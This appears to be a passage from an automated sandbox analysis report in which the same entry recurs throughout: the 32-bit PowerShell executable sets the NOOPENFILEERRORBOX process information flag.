              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
